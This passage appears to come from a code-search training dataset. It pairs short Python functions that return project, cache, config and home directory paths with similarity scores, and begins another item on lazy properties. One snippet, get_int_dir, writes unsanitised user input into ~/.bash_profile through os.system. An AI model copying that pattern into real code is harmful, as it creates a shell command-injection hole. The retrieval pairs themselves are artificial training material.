where you store your data files:\n return os.path.dirname(__file__)", "def dcm2niix() -> str:\n fsldir = fslplatform.platform.fsldir\n candidates = [\n shutil.which('dcm2niix')\n ]\n\n if fsldir is not None:\n candidates.insert(0, op.join(fsldir, 'bin', 'dcm2niix'))\n\n for c in candidates:\n if c is not None and op.exists(c):\n return c\n\n return 'dcm2niix'", "def root_dir():\n return dirname(dirname(__file__))", "def get_int_dir():\n try:\n int_dir = os.environ[\"INT_DIR\"]\n except KeyError:\n int_dir = input(\"Enter the (full path) directory \"\n \"where your interactions are stored: \")\n os.system(f\"echo 'export INT_DIR=\\\"{int_dir}\\\"\\n' >> ~/.bash_profile\")\n os.system(\". ~/.bash_profile\")\n return int_dir", "def user_conf_dir(self):\n return os.path.join(BaseDirectory.xdg_config_home, \"speech-dispatcher\")", "def ivy_cache_dir(self):\r\n return self._ivy_cache_dir", "def root_dir():\r\n return Path(__file__).parent.parent", "def path(self):\r\n if self._root_dir is None:\r\n if 'PANTS_BUILD_ROOT' in os.environ:\r\n self._root_dir = os.environ['PANTS_BUILD_ROOT']\r\n else:\r\n buildroot = os.path.abspath(os.getcwd())\r\n while not os.path.exists(os.path.join(buildroot, 'pants.ini')):\r\n if buildroot != os.path.dirname(buildroot):\r\n buildroot = os.path.dirname(buildroot)\r\n else:\r\n raise self.NotFoundError('Could not find pants.ini!')\r\n self._root_dir = buildroot\r\n return self._root_dir", "def ipynb_path(self):\n return Path(self.dir_path, self.index_file + \".ipynb\").abspath", "def get_htdocs_dirs(self):\n from pkg_resources import resource_filename\n return [('inieditorpanel', resource_filename(__name__, 'htdocs'))]\n #return []", "def data_dir():\n #data_path = os.path.dirname(intervene.__file__)\n #data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'example_data')\n #print(data_path)\n return os.path.join(os.path.dirname(__file__), 'example_data')", "def homedir():\n return os.path.expanduser('~')", "def cache_directory(self):\n return ('/var/cache/npm-accel'\n if os.getuid() == 0 and os.access('/var/cache', os.W_OK)\n else parse_path('~/.cache/npm-accel'))", "def install_destination(self):\n # return self.install_dir\n return self.mainmanager.Folders['mods'].path / self._install_dirname", "def pathtofolder():\n return os.getcwd()", "def get_package_dir():\n return Path(__file__).parent", "def store_china_path(self):\n return path.join(env.store_home_china, self._store_path)", "def _build_system_home(self, directory):\n\t\treturn directory", "def base_dir(self):\n pass", "def rdap_info_cache_directory() -> str:\n current_path = Path(__file__).resolve().parent\n return os.path.join(current_path, 'cache', 'rdap')", "def get_enry() -> str:\n return os.path.abspath(os.path.join(get_enry_dir(), \"enry\"))", "def user_plugin_dir() -> str:\n return os.path.join(user_data_dir(), 'plugins')", "def GetCurrentDir(self) -> str:\n ...", "def get_disassembler_user_directory(self):\n pass", "def base_path(self):\n return self.setup.base_path", "def printSlipSystemDirectory():\n packageDir, _ = os.path.split(__file__)\n print(\"Slip system definition files are stored in directory:\")\n print(f\"{packageDir}/slip_systems/\")", "def cwd_in_path():\n ...", "def info_directory(self) -> Optional[str]:\n raise NotImplementedError()", "def test_get_qiime_scripts_dir(self):\r\n # get_qiime_scripts_dir will raise an error if it can't find a scripts\r\n # directory.\r\n scripts_dir = get_qiime_scripts_dir()\r\n self.assertTrue(isdir(scripts_dir), \"The QIIME scripts directory does \"\r\n \"not exist: %s\" % scripts_dir)", "def directory_root():\n\timport os\n\treturn os.path.join(os.path.dirname(__file__), '../..')", "def home_directory(self):\n out = self._call(\"GETHOMEDIRECTORY\")\n return out.json()[\"Path\"]", "def data_dir():\n return _config.datadir", "def get_current_directory():\n\treturn os.path.dirname(os.path.abspath(__file__))", "def get_tmuxinator_dir() -> pathlib.Path:\n if \"TMUXINATOR_CONFIG\" in os.environ:\n return pathlib.Path(os.environ[\"TMUXINATOR_CONFIG\"]).expanduser()\n\n return pathlib.Path(\"~/.tmuxinator/\").expanduser()", "def cifar10_root():\n import os\n load_config()\n path = os.environ.get('CIFARROOT', None)\n assert path is not None\n if not os.path.isdir(path):\n import torchvision\n torchvision.datasets.CIFAR10(path, download=True)\n return path", "def get_installation_path():\n file_abs_path = os.path.abspath(__file__)\n real_file_abs_path = os.path.realpath(file_abs_path)\n return real_file_abs_path[:real_file_abs_path.find('/node')]", "def get_root_directory() -> str:\n return \"{}/../\".format(get_cur_directory(__file__))", "def homeDirectory(self):\n\t\treturn self.__homeDirectory", "def _getSshDir():\n return f'{Path.home()}/.ssh'", "def get_htdocs_dirs(self):\n\t\tfrom pkg_resources import resource_filename\n\t\treturn [('hw', resource_filename(__name__, 'htdocs'))]", "def query_interface_path():\n import concordancer.server\n return str(pathlib.Path(concordancer.server.__file__).parents[0] / \"dist/index.html\")", "def get_denoiser_data_dir():\r\n dir = get_qiime_project_dir() + \"/qiime/support_files/denoiser/Data/\"\r\n return dir", "def default_output_path():\n\n documents = os.path.join(os.path.expanduser('~'))\n try:\n documents = _xdg_documents_path()\n except: pass\n if platform.system() == 'Windows':\n try:\n documents = _win_documents_path()\n except: pass\n\n return os.path.join(documents, 'Topographica')", "def getmodulepath(modulename):\n return USERLIBDIR + '\\\\' + modulename + '.sikuli\\\\' + modulename + '.py'", "def get_xshear_config_dir(run):\n d=get_run_dir(run)\n return os.path.join(d, 'config')", "def test_infodir(self):\n self.chck_triple('infodir')", "def dir_tester_unzip_tmp():\n return abspath('tmpunzip')", "def app_config_home(self) -> str:\n if self.app_config_has(\"app_config_home_directory\"):\n return self.app_config()[\"app_config_home_directory\"]\n return os.path.join(os.path.expanduser(\"~\"), '.aiscalator')", "def get_appdir():\n\n return APP_PATH", "def dir_bin():\n return abspath('bin')", "def get_import_dir(self):\n return Path(__file__).parent / 'import_data'", "def featurefiledir():\n return __FEATURE_FILES_DIR__", "def source_root_dir():\n return os.path.abspath(os.path.dirname(__file__))", "def configPath(self):\n return os.path.dirname(__file__)", "def sublime_haskell_package_path():\n return os.path.dirname(os.path.realpath(__file__))", "def tmpDir(package):\n\treturn 'debian/'+package", "def MODULE_DIR(cls) -> str:\n from ixian_docker.modules import webpack\n\n return os.path.dirname(os.path.realpath(webpack.__file__))", "def outputdir():\n return __OUTPUT_DIR__", "def path_notebooks():\n return os.path.abspath(\n os.path.join(os.path.dirname(__file__), os.path.pardir, \"examples\")\n )", "def get_htdocs_dirs(self):\n from pkg_resources import resource_filename\n return [('bl', resource_filename(__name__, 'htdocs'))]", "def setup_instr_root_path_McStas():\n THIS_DIR = os.path.dirname(os.path.abspath(__file__))\n\n current_work_dir = os.getcwd()\n os.chdir(THIS_DIR) # Set work directory to test folder\n\n instrument = McStas_instr(\"test_instrument\", package_path=\"/\")\n\n os.chdir(current_work_dir)\n\n return instrument", "def GetIdbDir():\n return os.path.dirname(ida_loader.get_path(ida_loader.PATH_TYPE_IDB)) + os.sep", "def menpowidgets_src_dir_path():\n # to avoid cluttering the menpowidgets.base namespace\n from pathlib import Path\n import os.path\n\n return Path(os.path.abspath(__file__)).parent", "def current_directory (self):\r\n pass", "def get_work_dir() -> str:\n env_work_dir = os.environ.get(\"AMBIANIC_DIR\", os.getcwd())\n if not env_work_dir:\n env_work_dir = DEFAULT_WORK_DIR\n return env_work_dir", "def _makeEnvir():\n if not os.path.exists(\"Reports\"):\n os.mkdir(\"Reports\")\n if not os.path.exists(\"Caches\"):\n os.mkdir(\"Caches\")\n if not os.path.exists(\"Caches/GOLD\"):\n # must run inside the package itself so __name__ works\n goldZipFile = pkg_resources.resource_filename(__name__, \"resources/GOLD.zip\")\n copy(goldZipFile, \"Caches\") \n print \"First time VDM is run - installing GOLD into %s\" % (os.getcwd() + \"/Caches\")\n ZipFile(os.getcwd() + \"/Caches/GOLD.zip\").extractall(os.getcwd() + \"/Caches\")", "def get_script_directory():\n return os.path.dirname(__file__)", "def module_path():\n return os.path.dirname(unicode(__file__, sys.getfilesystemencoding( )))", "def rootdir():\n return util.path(__file__).parent.parent.abspath()", "def output_dir(self):\n return os.path.join(self._sandbox, 'output' + os.path.sep)", "def source_directory(self):\r\n return self.pip_requirement.source_dir", "def get_root_dir():\n return os.path.dirname(os.path.dirname(__file__))", "def default_cache_dir() -> str:\n running_on_colab = 'google.colab' in sys.modules\n if running_on_colab:\n base_dir = '/tmp'\n else:\n base_dir = os.path.expanduser('~')\n cache_dir = os.path.join(base_dir, '.cache/fedjax')\n return cache_dir", "def config_path():\n dir_ = os.path.dirname(__file__)\n demo_dir = os.path.join(dir_, '../..')\n return os.path.join(demo_dir, 'mike_dev.ini')", "def _get_config_path():\n return os.path.join(os.path.expanduser('~'))" ]
[ "0.59720445", "0.5938821", "0.5927095", "0.59131306", "0.58979726", "0.586261", "0.5823516", "0.58234173", "0.5788261", "0.57610697", "0.5754324", "0.57422614", "0.5687996", "0.565429", "0.5623156", "0.56043833", "0.5588141", "0.5566707", "0.55413353", "0.55124944", "0.55004644", "0.5496944", "0.5494677", "0.5489928", "0.54826725", "0.54781085", "0.5447915", "0.54107183", "0.53995085", "0.5384671", "0.53831226", "0.53406465", "0.53245354", "0.53135103", "0.5311598", "0.530395", "0.52990335", "0.52967674", "0.52853817", "0.5281504", "0.5281464", "0.52763355", "0.52744377", "0.5273516", "0.52646047", "0.52589476", "0.5258185", "0.5257971", "0.52569705", "0.5254391", "0.52466244", "0.52440447", "0.52439576", "0.5240398", "0.52397025", "0.52223605", "0.5219328", "0.52187294", "0.52167207", "0.5216411", "0.5203562", "0.5196047", "0.519339", "0.5192297", "0.51890093", "0.5186633", "0.5181436", "0.51782995", "0.5177376", "0.51758546", "0.51751196", "0.5173907", "0.5173601", "0.51705056", "0.51631397", "0.5159389", "0.5157865", "0.5154565", "0.515412", "0.5150549", "0.51497865", "0.51466733", "0.5146236", "0.51439303", "0.5140132", "0.5139691", "0.5130021", "0.51272315", "0.51259553", "0.5123039", "0.512279", "0.5119487", "0.5118439", "0.5117998", "0.5117194", "0.51109713", "0.5110932", "0.5108703", "0.5108352", "0.5105646" ]
0.7647922
0
Directory where ixian was run from
def PWD(cls): return pwd()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def IXIAN(cls):\n import ixian\n\n return os.path.dirname(os.path.realpath(ixian.__file__))", "def thisdir():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n # Change this bit to match where you store your data files:\n return os.path.dirname(__file__)", "def cwd(self):", "def GetCurrentDir(self) -> str:\n ...", "def cwd_in_path():\n ...", "def root_dir():\r\n return Path(__file__).parent.parent", "def get_script_directory():\n return os.path.dirname(__file__)", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def get_current_directory():\n\treturn os.path.dirname(os.path.abspath(__file__))", "def get_qiime_scripts_dir():\r\n script_fp = which('print_qiime_config.py')\r\n\r\n if script_fp is None:\r\n raise ScriptsDirError(\"Could not find the directory containing QIIME \"\r\n \"scripts. QIIME scripts must be accessible via \"\r\n \"the PATH environment variable, and they must \"\r\n \"be executable. Please ensure that you have a \"\r\n \"valid QIIME installation (see the QIIME \"\r\n \"Installation Guide: \"\r\n \"http://qiime.org/install/install.html).\")\r\n\r\n return dirname(script_fp)", "def root_dir():\n return dirname(dirname(__file__))", "def data_dir():\n #data_path = os.path.dirname(intervene.__file__)\n #data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'example_data')\n #print(data_path)\n return os.path.join(os.path.dirname(__file__), 'example_data')", "def current_directory (self):\r\n pass", "def directory_root():\n\timport os\n\treturn os.path.join(os.path.dirname(__file__), '../..')", "def get_teamocil_dir() -> pathlib.Path:\n return pathlib.Path(\"~/.teamocil/\").expanduser()", "def personaldir():\n if platform == 'windows':\n return os.path.join(os.environ['APPDATA'], 'automaton')\n else:\n return os.path.expanduser('~/.automaton/')", "def get_qiime_project_dir():\r\n # Get the full path of util.py\r\n current_file_path = abspath(__file__)\r\n # Get the directory containing util.py\r\n current_dir_path = dirname(current_file_path)\r\n # Return the directory containing the directory containing util.py\r\n return dirname(current_dir_path)", "def instance_dir(self):\n\t\treturn os.path.join(self.basedir, self.yml['instdir'])", "def pathtofolder():\n return os.getcwd()", "def setupRunDir(self):\n\n pass", "def systemdir():\n if platform == 'windows':\n return os.path.join(os.environ['ProgramFiles'], 'automaton')\n else:\n return \"/etc/automaton/\"", "def GetLauncherPath(self):\n return os.path.dirname(__file__)", "def GetLauncherPath(self):\n return os.path.dirname(__file__)", "def base_dir(self):\n pass", "def _get_R_script_dir(self):\r\n qiime_dir = get_qiime_project_dir()\r\n script_dir = join(qiime_dir, 'qiime', 'support_files', 'R')\r\n return script_dir", "def _get_R_script_dir(self):\r\n qiime_dir = get_qiime_project_dir()\r\n script_dir = join(qiime_dir, 'qiime', 'support_files', 'R')\r\n return script_dir", "def _get_R_script_dir(self):\r\n qiime_dir = get_qiime_project_dir()\r\n script_dir = join(qiime_dir, 'qiime', 'support_files', 'R')\r\n return script_dir", "def getScriptDirectory():\n\n\treturn os.path.dirname(os.path.realpath(__file__))", "def package_dir(self):\r\n return \".\"", "def datadir():\n return '../data/'", "def get_disassembler_user_directory(self):\n pass", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph5/src\"", "def cwd (self, path):\r\n pass", "def source_root_dir():\n return os.path.abspath(os.path.dirname(__file__))", "def get_root_directory() -> str:\n return \"{}/../\".format(get_cur_directory(__file__))", "def outputdir():\n return __OUTPUT_DIR__", "def get_installdir(self):\n import mewlo\n path = os.path.dirname(os.path.realpath(mewlo.__file__))\n return path", "def radishdir():\n return __RADISH_FILES_DIR__", "def rootdir():\n return util.path(__file__).parent.parent.abspath()", "def configPath(self):\n return os.path.dirname(__file__)", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph4/src\"", "def root_dir():\n return os.path.dirname(os.path.realpath(__file__ + '/..'))", "def root_dir():\n return os.path.dirname(os.path.realpath(__file__ + '/..'))", "def path(self):\r\n if self._root_dir is None:\r\n if 'PANTS_BUILD_ROOT' in os.environ:\r\n self._root_dir = os.environ['PANTS_BUILD_ROOT']\r\n else:\r\n buildroot = os.path.abspath(os.getcwd())\r\n while not os.path.exists(os.path.join(buildroot, 'pants.ini')):\r\n if buildroot != os.path.dirname(buildroot):\r\n buildroot = os.path.dirname(buildroot)\r\n else:\r\n raise self.NotFoundError('Could not find pants.ini!')\r\n self._root_dir = buildroot\r\n return self._root_dir", "def get_axebindir():\n import sys\n\n if 'axesrc' in sys.modules:\n modfile = sys.modules['axesrc'].__file__\n axebindir = os.path.abspath(os.path.join(os.path.dirname(modfile),'../bin/'))\n\n else:\n from pyraf import iraf\n\n # just read all variables\n all_variables = iraf.getVarDict()\n\n arch = all_variables['arch']\n stsdas = all_variables['stsdas']\n # compose the bin directory\n axebindir = os.path.join(stsdas, 'bin'+arch)\n #axe = all_variables['axe']\n #axebindir = all_variables['axebin']\n\n # compose the bin directory\n #axebindir = os.path.join(axe, 'bin')\n\n # return the path\n return axebindir", "def output_dir(self):\n return os.path.join(self._sandbox, 'output' + os.path.sep)", "def get_import_dir(self):\n return Path(__file__).parent / 'import_data'", "def rliPath():\r\n if isWindows():\r\n homeDir = win32api.GetShortPathName(os.path.expanduser('~'))\r\n return os.path.join(homeDir, 'AppData', 'Roaming', 'GRASS7', 'r.li')\r\n else:\r\n return os.path.join(os.path.expanduser(\"~\"), '.grass7', 'r.li')", "def get_root_dir():\n return os.path.dirname(os.path.dirname(__file__))", "def Directory(self) -> str:", "def sirv_truth_dir(self):\n return op.join(self.root_dir, \"SIRV\")", "def data_dir():\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')", "def test_dir():\n return os.path.abspath(os.path.dirname(__file__))", "def workDir(self):\n self.debug.printHeader()\n #if hasattr(self.settings, \"workDir\"): toret=self.settings.workDir # 025 todo 143\n if self.settings.config.has_section(\"files\") and self.settings.config.has_option(\"files\",\"workDir\"):\n # toret=self.settings.get(\"files\",\"workDir\") 025\n toret=self.settings.workDir\n else: toret=os.environ['HOME']+'/xxz'\n # Also could write workdir back to settings.\n return toret", "def get_base_dir(self):\n dir_of_this_file = os.path.dirname(os.path.abspath(__file__))\n return os.path.dirname(dir_of_this_file)", "def get_enry_dir() -> str:\n return os.path.abspath(os.path.join(os.path.dirname(__file__), \"build\"))", "def get_output_path():\n return os.getcwd() + \"/output/\"", "def get_main_dir():\n return os.path.dirname(os.getcwd())", "def _get_path(): # THIS IS JUST FOR GETTING THE FILE\n return os.path.dirname(os.path.abspath(__file__)) + '/'", "def data_dir():\n return _config.datadir", "def base_path(self):\n return self.setup.base_path", "def location(self):\n\n p = os.path.abspath(__file__)\n pathSP = os.path.split(p)\n return pathSP", "def path_to_program_dir(self):\n\tpath = sys.argv[0]\n\n\tif not os.path.isdir(path):\n\t path = os.path.dirname(path)\n\n\tif not path: return '.'\n\n\treturn path", "def root_dir():\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', \"..\")", "def get_working_directory():\n return os.getcwd()", "def module_path(self):\n return self.config['cwd']", "def project_root_files():\n return [\"parent_workflow.wdl\"]", "def _dir(self):\r\n self._h_dir = os.path.abspath(os.path.dirname(__file__))\r\n self._var_dir = os.path.join(self._h_dir, 'var')\r\n self._work_dir = os.path.join(self._h_dir, 'working')\r\n self._lib_dir = os.path.join(self._h_dir, 'lib')\r\n self._hylib_dir = os.path.join(self._lib_dir, 'hylib')\r\n self._hyutil_dir = os.path.join(self._lib_dir, 'hyutil')\r\n self._exe_dir = os.path.join(self._h_dir, 'exe')\r\n if not os.path.isdir(self._var_dir):\r\n os.mkdir(self._var_dir)\r\n if not os.path.isdir(self._work_dir):\r\n raise Exception('No HYSPLIT working directory found')\r\n for i in ['Error.txt', 'Queue.txt', 'Truncated.txt']:\r\n if not os.path.isfile(os.path.join(self._var_dir, i)):\r\n open(os.path.join(self._var_dir, i), 'w').close()", "def test_get_qiime_scripts_dir(self):\r\n obs = get_qiime_scripts_dir()\r\n\r\n # We can't do much testing of the observed value, but let's at least\r\n # check that the directory exists.\r\n self.assertTrue(isdir(obs))", "def get_appdir():\n\n return APP_PATH", "def ipynb_path(self):\n return Path(self.dir_path, self.index_file + \".ipynb\").abspath", "def menpowidgets_src_dir_path():\n # to avoid cluttering the menpowidgets.base namespace\n from pathlib import Path\n import os.path\n\n return Path(os.path.abspath(__file__)).parent", "def getRootPath()->str:\n if '--develop' in sys.argv:\n return eel._get_real_path('public') + '/'\n\n return eel._get_real_path('build') + '/'", "def dir(cls, config):\r\n # TODO(John Sirois): This is centralized, but in an awkward location. Isolate RunInfo reading\r\n # and writing in 1 package or class that could naturally know this location and synthesize\r\n # info_file names.\r\n return config.getdefault('info_dir',\r\n default=os.path.join(config.getdefault('pants_workdir'), 'runs'))", "def user_conf_dir(self):\n return os.path.join(BaseDirectory.xdg_config_home, \"speech-dispatcher\")", "def experiment_dir(experiment_name: str) -> Path: # pragma: no cover\n return EXPERIMENTS_DIR / experiment_name", "def get_base_dir(self):\n return self._config_dict['output']['@baseDirectory']", "def test():\n return os.path.dirname(__file__)", "def base_dir():\n return os.path.join(TrainFile.base_dir(), 'model')", "def find_path():\n __dir_path__ = os.path.dirname(os.path.realpath(__file__))\n return __dir_path__", "def getRootDirectory(self):\n if Globals.WORKFLOWS_BASEDIR[0] == '~':\n return os.path.expanduser(Globals.WORKFLOWS_BASEDIR)\n else:\n return os.path.join('', Globals.WORKFLOWS_BASEDIR)", "def ifaces_dir(self):\n return self.system_path(self._ifaces_dir)", "def GetSwigOutDir(cls):\n return os.path.join(FileUtils.GetEDir(), 'swig')", "def path_notebooks():\n return os.path.abspath(\n os.path.join(os.path.dirname(__file__), os.path.pardir, \"examples\")\n )", "def setUtilPath(self):\r\n utilpath.COMMANDER = _search_file(BASE_DIR,'Commander',True)[0]\r\n utilpath.STATBLOCKFIELDREADER = _search_file(BASE_DIR,'StatBlockFieldReader',True)[0]\r\n utilpath.HOSTMANAGER = _search_file(BASE_DIR,'HostManager',True)[0]\r\n utilpath.DATAVIEW = _search_file(TOOLS_DIR,'DataView',True)[0]", "def basepath():\n return os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n '..'\n )\n )", "def get_package_dir():\n return Path(__file__).parent", "def test_data_dir(self):\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')", "def getPath(self):\n path = os.path.dirname(os.path.realpath(__file__)) #Finds the path of the application\n path =(os.path.dirname(os.path.realpath(__file__))+ '\\\\Enigma Settings') #Adds to the directory to create a folder\n \n return path #Returns the folders directory", "def homeDirectory(self):\n\t\treturn self.__homeDirectory", "def main():\n if getattr(sys, 'frozen', False):\n folderCurrent = os.path.dirname(sys.executable)\n else:\n folderCurrent = os.path.abspath(os.path.dirname(__file__))\n\n replaceAll(folderCurrent)", "def this_folder():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n return os.path.dirname(__file__)", "def test_get_qiime_scripts_dir(self):\r\n # get_qiime_scripts_dir will raise an error if it can't find a scripts\r\n # directory.\r\n scripts_dir = get_qiime_scripts_dir()\r\n self.assertTrue(isdir(scripts_dir), \"The QIIME scripts directory does \"\r\n \"not exist: %s\" % scripts_dir)", "def get_xshear_config_dir(run):\n d=get_run_dir(run)\n return os.path.join(d, 'config')", "def stick_everything_into_cwd():\n global DATA_HOME\n\n DATA_HOME = ''", "def here(*args):\n return os.path.join(os.path.dirname(__file__), *args)", "def rdap_info_cache_directory() -> str:\n current_path = Path(__file__).resolve().parent\n return os.path.join(current_path, 'cache', 'rdap')", "def get_work_dir() -> str:\n env_work_dir = os.environ.get(\"AMBIANIC_DIR\", os.getcwd())\n if not env_work_dir:\n env_work_dir = DEFAULT_WORK_DIR\n return env_work_dir", "def base_dir(context):\n return '{}'.format(os.getcwd())", "def get_path() -> str:\n return os.path.dirname(os.path.realpath(__file__))", "def get_data_dir():\n return Path(current_app.config[\"USER_DIR\"]) / \"data\"" ]
[ "0.7374015", "0.6456549", "0.6438797", "0.64322007", "0.6419231", "0.6372672", "0.6354939", "0.635183", "0.6337567", "0.6308413", "0.6282552", "0.62738544", "0.62561786", "0.62519723", "0.62439907", "0.6243649", "0.62358207", "0.623114", "0.6230654", "0.6224367", "0.6190694", "0.6167081", "0.6167081", "0.61577827", "0.61252654", "0.61252654", "0.61252654", "0.6124033", "0.6119846", "0.6113667", "0.61089855", "0.60984737", "0.6097553", "0.6083087", "0.6081327", "0.60674155", "0.6062372", "0.60599476", "0.6053184", "0.604932", "0.60475576", "0.6039779", "0.6039779", "0.60395765", "0.60270566", "0.60253453", "0.6009446", "0.59919053", "0.59879935", "0.59873044", "0.59709054", "0.5959175", "0.5952172", "0.59454864", "0.5943719", "0.5935619", "0.5923992", "0.590994", "0.589479", "0.5870464", "0.5869514", "0.58671254", "0.58651894", "0.58573633", "0.58526385", "0.5850947", "0.5821904", "0.5818283", "0.5806523", "0.5803608", "0.58033377", "0.5801693", "0.57951665", "0.5789179", "0.5783691", "0.57818437", "0.5759441", "0.5751627", "0.57513666", "0.574566", "0.57453334", "0.57416075", "0.5739235", "0.57385325", "0.57314503", "0.57308286", "0.57291204", "0.5727077", "0.5717448", "0.5714295", "0.57126766", "0.5708977", "0.5707678", "0.5702565", "0.57019925", "0.5701267", "0.56957626", "0.56951296", "0.56947833", "0.56923836", "0.5681264" ]
0.0
-1
Overloaded to implement recursive lazy evaluation of properties.
def __getattribute__(self, key): from ixian.task import TASKS formatted_key = key.lower() if formatted_key in TASKS: task = TASKS[formatted_key] return TaskConfig(task) else: return super(TasksConfig, self).__getattribute__(key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lazyprop(fn):\n\n @property\n def _lazyprop(self):\n if not hasattr(self, _LAZY_PROP_VALUES):\n setattr(self, _LAZY_PROP_VALUES, {})\n lazy_props_dict = self.__dict__[_LAZY_PROP_VALUES]\n if fn.__name__ not in lazy_props_dict:\n lazy_props_dict[fn.__name__] = fn(self)\n return lazy_props_dict[fn.__name__]\n\n return _lazyprop", "def lazyproperty(f: Callable[..., Any]):\n # pylint: disable=unused-variable\n return property(functools.lru_cache(maxsize=100)(f))", "def test_lazy_evaluation(self):\n pass", "def has_lazyprop(object, property_name):\n if hasattr(object, _LAZY_PROP_VALUES):\n return property_name in object.__dict__[_LAZY_PROP_VALUES]\n return False", "def lazy(fn):\n attr_name = '_lazy_' + fn.__name__\n @property\n def _lazyprop(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fn(self))\n return getattr(self, attr_name)\n return _lazyprop", "def lazy_property_factory(lazy_property):\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter", "def evaluate_lazy_object(obj):\n wrapped_obj = getattr(obj, LAZY_OBJECT_NAME, None)\n if wrapped_obj is None:\n # if it isn't a lazy object then just return the original object...\n return obj\n if wrapped_obj is uninitialized_lazy_object:\n # if it is a lazy object but, hasn't been initialized yet\n # then initialize it & return it\n obj._setup()\n return getattr(obj, LAZY_OBJECT_NAME)\n # return the lazy object...\n return wrapped_obj", "def cached_property(f):\r\n def get(self):\r\n try:\r\n return self._property_cache[f]\r\n except AttributeError:\r\n self._property_cache = {}\r\n x = self._property_cache[f] = f(self)\r\n return x\r\n except KeyError:\r\n x = self._property_cache[f] = f(self)\r\n return x\r\n \r\n return property(get)", "def lazy_properties(*lazy_properties):\n def lazy_property_factory(lazy_property):\n \"\"\"Create properties that perform lazy loading of attributes.\"\"\"\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter\n\n def wrap_dataset(dataset):\n if not issubclass(dataset, InMemoryDataset):\n raise ValueError(\"Only InMemoryDataset supports lazy loading\")\n\n # Attach the lazy loading properties to the class\n for lazy_property in lazy_properties:\n setattr(dataset, lazy_property,\n property(*lazy_property_factory(lazy_property)))\n\n # Delete the values of lazy properties when serializing\n if not hasattr(dataset, '__getstate__'):\n def __getstate__(self):\n serializable_state = self.__dict__.copy()\n for lazy_property in lazy_properties:\n attr = serializable_state.get('_' + lazy_property)\n # Iterators would lose their state\n if isinstance(attr, collections.Iterator):\n raise ValueError(\"Iterators can't be lazy loaded\")\n serializable_state.pop('_' + lazy_property, None)\n return serializable_state\n setattr(dataset, '__getstate__', __getstate__)\n\n return dataset\n return wrap_dataset", "def clear_lazyprop(object, property_name):\n assert isinstance(property_name, str)\n\n if _LAZY_PROP_VALUES in object.__dict__:\n if property_name in object.__dict__[_LAZY_PROP_VALUES]:\n del object.__dict__[_LAZY_PROP_VALUES][property_name]\n\n if _LAZY_PROP_SUBSCRIBERS in object.__dict__:\n if property_name in object.__dict__[_LAZY_PROP_SUBSCRIBERS]:\n for fn in object.__dict__[_LAZY_PROP_SUBSCRIBERS][property_name]:\n fn(object)", "def properties(expression, stream):\n def index(expression, stream):\n item = expression.children[0].children[0]\n for node in stream:\n if isinstance(node, Object):\n yield node.get(item, null)\n elif not optional(expression):\n itype = expression.children[0].data\n if itype == 'cname':\n itype = 'string'\n raise TypeError(\n 'cannot index {} with {}'.format(\n node.__class__.__name__, itype\n )\n )\n\n for expression in expression.children:\n stream = index(expression, stream)\n\n for node in stream:\n yield node", "def cached_property(func):\n return Property(fget=func, cached=True)", "def _get_property(self, xpaths):\n result = None\n for xpath in xpaths:\n result = self[xpath]\n if len(result) > 0:\n break\n\n return result", "def clear_all_lazyprops(object):\n if _LAZY_PROP_VALUES in object.__dict__:\n del object.__dict__[_LAZY_PROP_VALUES]\n\n if _LAZY_PROP_SUBSCRIBERS in object.__dict__:\n for subscribers in object.__dict__[_LAZY_PROP_SUBSCRIBERS].values():\n for fn in subscribers:\n fn(object)", "def _cache_property_mutator(self, name):\n try:\n methods = self.instance_properties[name]\n except KeyError:\n methods = self._cache_property_methods(name)\n self.instance_properties[name] = methods\n if methods:\n return methods[1]\n return None", "def subscribe_to_lazy_prop(object, property_name, on_change_func):\n assert isinstance(property_name, str)\n\n if not hasattr(object, _LAZY_PROP_SUBSCRIBERS):\n setattr(object, _LAZY_PROP_SUBSCRIBERS, defaultdict(lambda: set()))\n\n object.__dict__[_LAZY_PROP_SUBSCRIBERS][property_name].add(on_change_func)", "def child_properties(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n children = self.se.property_only_graph.successors(self.uri)\n result = restructure_output(self,\n children,\n inspect.stack()[0][3],\n self.output_type)\n return result", "def __getattribute__(self, name):\n if name == '__root__' or name == '__pepth__':\n return list.__getattribute__(self, name)\n if not name.endswith('___') and name.startswith('__') and name.endswith('__'):\n raise AttributeError('plist objects cannot call reserved members of their elements: \\'%s\\'' % name)\n try:\n return plist.__getattr__(self, name)\n except AttributeError:\n pass\n if ((name.startswith('__') and name.endswith('___'))\n or (not name.startswith('__') and name.endswith('_'))):\n # Allows calling one level deeper by adding '_' to the end of a property name. This is recursive, so '__' on the end goes two levels deep, etc.\n # Works for both regular properties (foos.bar_) and private properties (foos.__len___).\n try:\n starting_unders = 2 if name.startswith('__') else 0 # We don't care about single starting underscores for this count\n ending_unders = 0\n for i in range(len(name) - 1, 0, -1):\n if name[i] == '_':\n ending_unders += 1\n else:\n break\n ending_unders -= starting_unders\n return plist.__getattr__(self, name[:-ending_unders], _pepth=ending_unders)\n except AttributeError:\n 